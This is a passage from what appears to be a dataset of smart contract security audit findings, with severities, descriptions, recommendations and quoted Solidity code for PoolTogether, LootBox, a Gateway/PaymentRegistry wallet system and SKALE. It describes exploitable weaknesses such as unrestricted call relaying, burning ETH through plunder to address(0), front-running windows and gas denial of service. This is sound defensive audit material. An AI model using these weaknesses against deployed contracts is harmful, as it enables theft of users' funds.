ERC20/ERC721 token awards prior to the user claiming them (admin front-running opportunity)\\n```\\nfunction removeExternalErc20Award(address \\_externalErc20, address \\_prevExternalErc20) external onlyOwner {\\n externalErc20s.removeAddress(\\_prevExternalErc20, \\_externalErc20);\\n emit ExternalErc20AwardRemoved(\\_externalErc20);\\n}\\n```\\n\\n```\\nfunction removeExternalErc721Award(address \\_externalErc721, address \\_prevExternalErc721) external onlyOwner {\\n externalErc721s.removeAddress(\\_prevExternalErc721, \\_externalErc721);\\n delete externalErc721TokenIds[\\_externalErc721];\\n emit ExternalErc721AwardRemoved(\\_externalErc721);\\n}\\n```\\n\\nthe `PeriodicPrizeStrategy` `owner` (also see concerns outlined in issue 5.4) can transfer external ERC20 at any time to avoid them being awarded to users. there is no guarantee to the user.\\n```\\nfunction transferExternalERC20(\\n address to,\\n address externalToken,\\n uint256 amount\\n)\\n external\\n onlyOwner\\n{\\n prizePool.transferExternalERC20(to, externalToken, amount);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.",,```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n +PeriodicPriceStrategy - addExternalErc721Award duplicate or invalid tokenIds may block award phase,medium,"The prize-strategy owner (or a listener) can add `ERC721` token awards by calling `addExternalErc721Award` providing the `ERC721` token address and a list of `tokenIds` owned by the prizePool.\\nThe method does not check if duplicate `tokenIds` or `tokenIds` that are not owned by the contract are provided. This may cause an exception when `_awardExternalErc721s` calls `prizePool.awardExternalERC721` to transfer an invalid or previously transferred token, blocking the award phase.\\nNote: An admin can recover from this situation by removing and re-adding the `ERC721` token from the awards list.\\nadding `tokenIds`\\n```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), ""PeriodicPrizeStrategy/external-erc721-not-contract"");\\n require(prizePool.canAwardExternal(\\_externalErc721), ""PeriodicPrizeStrategy/cannot-award-external"");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), ""PeriodicPrizeStrategy/unavailable-token"");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n\\nawarding tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n\\ntransferring the tokens\\n```\\n/// @notice Called by the prize strategy to award external ERC721 prizes\\n/// @dev Used to award any arbitrary NFTs held by the Prize Pool\\n/// @param to The address of the winner that receives the award\\n/// @param externalToken The address of the external NFT token being awarded\\n/// @param tokenIds An array of NFT Token IDs to be transferred\\nfunction awardExternalERC721(\\n address to,\\n address externalToken,\\n uint256[] calldata tokenIds\\n)\\n external override\\n onlyPrizeStrategy\\n{\\n require(\\_canAwardExternal(externalToken), ""PrizePool/invalid-external-token"");\\n\\n if (tokenIds.length == 0) {\\n return;\\n }\\n\\n for (uint256 i = 0; i < tokenIds.length; i++) {\\n IERC721(externalToken).transferFrom(address(this), to, tokenIds[i]);\\n }\\n\\n emit AwardedExternalERC721(to, externalToken, tokenIds);\\n}\\n```\\n",Ensure that no duplicate token-ids were provided or skip over token-ids that are not owned by prize-pool (anymore).,,"```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), ""PeriodicPrizeStrategy/external-erc721-not-contract"");\\n require(prizePool.canAwardExternal(\\_externalErc721), ""PeriodicPrizeStrategy/cannot-award-external"");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), ""PeriodicPrizeStrategy/unavailable-token"");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n" +PeriodicPrizeStrategy - Token with callback related warnings (ERC777 a.o.),medium,"This issue is highly dependent on the configuration of the system. If an admin decides to allow callback enabled token (e.g. `ERC20` compliant `ERC777` or other ERC721/ERC20 extensions) as awards then one recipient may be able to\\nblock the payout for everyone by forcing a revert in the callback when accepting token awards\\nuse the callback to siphon gas, mint gas token, or similar activities\\npotentially re-enter the `PrizeStrategy` contract in an attempt to manipulate the payout (e.g. by immediately withdrawing from the pool to manipulate the 2nd ticket.draw())\\n```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n",It is highly recommended to not allow tokens with callback functionality into the system. Document and/or implement safeguards that disallow the use of callback enabled tokens. Consider implementing means for the “other winners” to withdraw their share of the rewards independently from others.,,"```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n" +PeriodicPrizeStrategy - unbounded external tokens linked list may be used to force a gas DoS,medium,"The size of the linked list of ERC20/ERC721 token awards is not limited. This fact may be exploited by an administrative account by adding an excessive number of external token addresses.\\nThe winning user might want to claim their win by calling `completeAward()` which fails in one of the `_distribute() -> _awardAllExternalTokens() -> _awardExternalErc20s/_awardExternalErc721s` while loops if too many token addresses are configured and gas consumption hits the block gas limit (or it just gets too expensive for the user to call).\\nNote: an admin can recover from this situation by removing items from the list.\\n```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n require(prizePool.canAwardExternal(\\_externalErc20), ""PeriodicPrizeStrategy/cannot-award-external"");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n\\n```\\n/// @param newAddress The address to shift to the front of the list\\nfunction addAddress(Mapping storage self, address newAddress) internal {\\n require(newAddress != SENTINEL && newAddress != address(0), ""Invalid address"");\\n require(self.addressMap[newAddress] == address(0), ""Already added"");\\n self.addressMap[newAddress] = self.addressMap[SENTINEL];\\n self.addressMap[SENTINEL] = newAddress;\\n self.count = self.count + 1;\\n}\\n```\\n\\nawarding the tokens loops through the linked list of configured tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n",Limit the number of tokens an admin can add. Consider implementing an interface that allows the user to claim tokens one-by-one or in user-configured batches.,,"```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n require(prizePool.canAwardExternal(\\_externalErc20), ""PeriodicPrizeStrategy/cannot-award-external"");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n" +MultipleWinners - setNumberOfWinners does not enforce count>0,medium,"The constructor of `MultipleWinners` enforces that the argument `_numberOfWinners > 0` while `setNumberOfWinners` does not. A careless or malicious admin might set `__numberOfWinners` to zero to cause the `distribute()` method to throw and not pay out any winners.\\nenforced in the constructor\\n```\\nrequire(\\_numberOfWinners > 0, ""MultipleWinners/num-gt-zero"");\\n```\\n\\nnot enforced when updating the value at a later stage\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n",Require that `numberOfWinners > 0`.,,"```\\nrequire(\\_numberOfWinners > 0, ""MultipleWinners/num-gt-zero"");\\n```\\n" +LootBox - plunder should disallow plundering to address(0),medium,"Anyone can call `LootboxController.plunder()` to plunder on behalf of a `tokenId` owner. If a `LootBox` received an AirDrop but no `NFT` was issued to an owner (yet) this might open up an opportunity for a malicious actor to call `plunder()` in an attempt to burn the ETH and any airdropped tokens that allow transfers to `address(0)`.\\nNote:\\nDepending on the token implementation, transfers may or may not revert if the `toAddress == address(0)`, while burning the `ETH` will succeed.\\nThis might allow anyone to forcefully burn received `ETH` that would otherwise be available to the future beneficiary\\nIf the airdrop and transfer of `LootBox` ownership are not done within one transaction, this might open up a front-running window that allows a third party to burn air-dropped `ETH` before it can be claimed by the `owner`.\\nconsider one component issues the airdrop in one transaction (or block) and setting the `owner` in a later transaction (or block). The `owner` is unset for a short duration of time which might allow anyone to burn `ETH` held by the `LootBox` proxy instance.\\n`plunder()` receiving the `owner` of an `ERC721.tokenId`\\n```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n\\nThe modified `ERC721` returns `address(0)` if the owner is not known\\n```\\n \\* @dev See {IERC721-ownerOf}.\\n \\*/\\nfunction ownerOf(uint256 tokenId) public view override returns (address) {\\n return \\_tokenOwners[tokenId];\\n}\\n```\\n\\nWhile `withdraw[ERC20|ERC721|ERC1155]` fail with `to == address(0)`, `transferEther()` succeeds and burns the eth by sending it to `address(0)`\\n```\\nfunction plunder(\\n IERC20[] memory erc20,\\n WithdrawERC721[] memory erc721,\\n WithdrawERC1155[] memory erc1155,\\n address payable to\\n) external {\\n \\_withdrawERC20(erc20, to);\\n \\_withdrawERC721(erc721, to);\\n \\_withdrawERC1155(erc1155, to);\\n transferEther(to, address(this).balance);\\n}\\n```\\n",Require that the destination address `to` in `plunder()` and `transferEther()` is not `address(0)`.,,"```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n" +PeriodicPrizeStrategy - Inconsistent behavior between award-phase modifiers and view functions,low,"The logic in the `canStartAward()` function is inconsistent with that of the `requireCanStartAward` modifier, and the logic in the `canCompleteAward()` function is inconsistent with that of the `requireCanCompleteAward` modifier. Neither of these view functions appear to be used elsewhere in the codebase, but the similarities between the function names and the corresponding modifiers is highly misleading.\\n`canStartAward()` is inconsistent with `requireCanStartAward`\\n```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n\\n```\\nmodifier requireCanStartAward() {\\n require(\\_isPrizePeriodOver(), ""PeriodicPrizeStrategy/prize-period-not-over"");\\n require(!isRngRequested() || isRngTimedOut(), ""PeriodicPrizeStrategy/rng-already-requested"");\\n \\_;\\n}\\n```\\n\\n`canCompleteAward()` is inconsistent with `requireCanCompleteAward`\\n```\\nfunction canCompleteAward() external view returns (bool) {\\n return isRngRequested() && isRngCompleted();\\n}\\n```\\n\\n```\\nmodifier requireCanCompleteAward() {\\n require(\\_isPrizePeriodOver(), ""PeriodicPrizeStrategy/prize-period-not-over"");\\n require(isRngRequested(), ""PeriodicPrizeStrategy/rng-not-requested"");\\n require(isRngCompleted(), ""PeriodicPrizeStrategy/rng-not-complete"");\\n \\_;\\n}\\n```\\n",Make the logic consistent between the view functions and the modifiers of the same name or remove the functions.,,```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n +MultipleWinners - Awards can be guaranteed with a set number of tickets,low,"Because additional award drawings are distributed at a constant interval in the `SortitionSumTree` by `MultipleWinners._distribute()`, any user that holds a number of tickets `>= floor(totalSupply / __numberOfWinners)` can guarantee at least one award regardless of the initial drawing.\\nMultipleWinners._distribute():\\n```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\n","Do not distribute awards at fixed intervals from the initial drawing, but instead randomize the additional drawings as well.",,```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\n +MultipleWinners - Inconsistent behavior compared to SingleRandomWinner,low,"The `MultipleWinners` strategy carries out award distribution to the zero address if `ticket.draw()` returns `address(0)` (indicating an error condition) while `SingleRandomWinner` does not.\\n`SingleRandomWinner` silently skips award distribution if `ticket.draw()` returns `address(0)`.\\n```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n\\n`MultipleWinners` still attempts to distribute awards if `ticket.draw()` returns `address(0)`. This may or may not succeed depending on the implementation of the tokens included in the `externalErc20s` and `externalErc721s` linked lists.\\n```\\nfunction \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n\\n // main winner gets all external tokens\\n address mainWinner = ticket.draw(randomNumber);\\n \\_awardAllExternalTokens(mainWinner);\\n\\n address[] memory winners = new address[](\\_\\_numberOfWinners);\\n winners[0] = mainWinner;\\n```\\n",Implement consistent behavior. Avoid hiding error conditions and consider throwing an exception instead.,,"```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n" +Initialize implementations for proxy contracts and protect initialization methods,low,"Any situation where the implementation of proxy contracts can be initialized by third parties should be avoided. This can be the case if the `initialize` function is unprotected or not initialized immediately after deployment. Since the implementation contract is not meant to be used directly without a proxy delegate-calling to it, it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nThis affects all proxy implementations (the delegatecall target contract) deployed in the system.\\nThe implementation for `MultipleWinners` is not initialized. Even though not directly used by the system it may be initialized by a third party.\\n```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n\\nThe deployed `ERC721Contract` is not initialized.\\n```\\nconstructor () public {\\n erc721ControlledInstance = new ERC721Controlled();\\n erc721ControlledBytecode = MinimalProxyLibrary.minimalProxy(address(erc721ControlledInstance));\\n}\\n```\\n\\nThe deployed `LootBox` is not initialized.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n",Initialize unprotected implementation contracts in the implementation's constructor. Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.,,```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n +LootBox - transferEther should be internal,low,"`LootBox.transferEther()` can be `internal` as it is only called from `LootBox.plunder()` and the LootBox(proxy) instances are generally very short-living (created and destroyed within one transaction).\\n```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\n",Restrict transferEther()'s visibility to `internal`.,,"```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\n" +LootBox - executeCalls can be misused to relay calls,low,"`LootBox` is deployed with `LootBoxController` and serves as the implementation for individual `create2` lootbox proxy contracts. None of the methods of the `LootBox` implementation contract are access restricted. A malicious actor may therefore use the `executeCalls()` method to relay arbitrary calls to other contracts on the blockchain in an attempt to disguise the origin or misuse the reputation of the `LootBox` contract (as it belongs to the PoolTogether project).\\nNote: allows non-value and value calls (deposits can be forces via selfdestruct)\\n```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\n",Restrict access to call forwarding functionality to trusted entities. Consider implementing the `Ownable` pattern allowing access to functionality to the owner only.,,"```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\n" +ERC20 tokens with no return value will fail to transfer,high,"Although the ERC20 standard suggests that a transfer should return `true` on success, many tokens are non-compliant in this regard.\\nIn that case, the `.transfer()` call here will revert even if the transfer is successful, because solidity will check that the RETURNDATASIZE matches the ERC20 interface.\\n```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\n",Consider using OpenZeppelin's SafeERC20.,,"```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\n" +Delegated transactions can be executed for multiple accounts,high,"The `Gateway` contract allows users to create meta transactions triggered by the system's backend. To do so, one of the owners of the account should sign the message in the following format:\\n```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n\\nThe message includes a nonce, destination address, and call data. The problem is that this message does not include the `account` address. So if the `sender` is the owner of multiple accounts, this meta transaction can be called for multiple accounts.",Resolution\\nComment from the client: The issue has been solved\\nAdd the `account` field in the signed message or make sure that any address can be the owner of only one `account`.,,"```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n" +Removing an owner does not work in PersonalAccountRegistry,high,"An owner of a personal account can be added/removed by other owners. When removing the owner, only `removedAtBlockNumber` value is updated. `accounts[account].owners[owner].added` remains true:\\n```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n\\nBut when the account is checked whether this account is the owner, only `accounts[account].owners[owner].added` is actually checked:\\n```\\nfunction \\_verifySender(\\n address account\\n)\\n private\\n returns (address)\\n{\\n address sender = \\_getContextSender();\\n\\n if (!accounts[account].owners[sender].added) {\\n require(\\n accounts[account].salt == 0\\n );\\n\\n bytes32 salt = keccak256(\\n abi.encodePacked(sender)\\n );\\n\\n require(\\n account == \\_computeAccountAddress(salt)\\n );\\n\\n accounts[account].salt = salt;\\n accounts[account].owners[sender].added = true;\\n\\n emit AccountOwnerAdded(\\n account,\\n sender\\n );\\n }\\n\\n return sender;\\n}\\n```\\n\\nSo the owner will never be removed, because `accounts[account].owners[owner].added` will always be `true.",Properly check if the account is still the owner in the `_verifySender` function.,,"```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n" +The withdrawal mechanism is overcomplicated,medium,"To withdraw the funds, anyone who has the account in `PaymentRegistry` should call the `withdrawDeposit` function and go through the withdrawal process. After the lockdown period (30 days), the user will withdraw all the funds from the account.\\n```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n\\nDuring that period, everyone who has a channel with the user is forced to commit their channels or lose money from that channel. When doing so, every user will reset the initial lockdown period and the withdrawer should start the process again.\\n```\\nif (deposits[sender].withdrawalLockedUntil[token] > 0) {\\n deposits[sender].withdrawalLockedUntil[token] = 0;\\n```\\n\\nThere is no way for the withdrawer to close the channel by himself. If the withdrawer has N channels, it's theoretically possible to wait for up to N*(30 days) period and make N+2 transactions.","There may be some minor recommendations on how to improve that without major changes:\\nWhen committing a payment channel, do not reset the lockdown period to zero. Two better option would be either not change it at all or extend to `now + depositWithdrawalLockPeriod`",,"```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n" +The lockdown period shouldn't be extended when called multiple times,low,"In order to withdraw a deposit from the `PaymentRegistry`, the account owner should call the `withdrawDeposit` function and wait for `depositWithdrawalLockPeriod` (30 days) before actually transferring all the tokens from the account.\\nThe issue is that if the withdrawer accidentally calls it for the second time before these 30 days pass, the waiting period gets extended for 30 days again.\\n```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\n",Resolution\\nComment from the client: The issue has been solved\\nOnly extend the waiting period when a withdrawal is requested for the first time.,,"```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\n" +Gateway can call any contract Acknowledged,low,"Resolution\\nComment from the client: That's right Gateway can call any contract, we want to keep it open for any external contract.\\nThe `Gateway` contract is used as a gateway for meta transactions and batched transactions. It can currently call any contract, while is only intended to call specific contracts in the system that implemented `GatewayRecipient` interface:\\n```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n\\nThere are currently no restrictions for `to` value.","Make sure, only intended contracts can be called by the `Gateway` : `PersonalAccountRegistry`, `PaymentRegistry`, `ENSController`.",,"```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n" +Remove unused code,low,"```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\n","It is recommended to remove this value as there are no use cases for it at the moment, however if it is planned to be used in the future, it should be well documented in the code to prevent confusion.",,"```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\n" +Every node gets a full validator's bounty,high,"Resolution\\nThis issue is addressed in Bug/skale 3273 formula fix 435 and SKALE-3273 Fix BountyV2 populating error 438.\\nThe main change is related to how bounties are calculated for each validator. Below are a few notes on these pull requests:\\n`nodesByValidator` mapping is no longer used in the codebase and the non-zero values are deleted when `calculateBounty()` is called for a specific validator. The mapping is kept in the code for compatible storage layout in upgradable proxies.\\nSome functions such as `populate()` was developed for 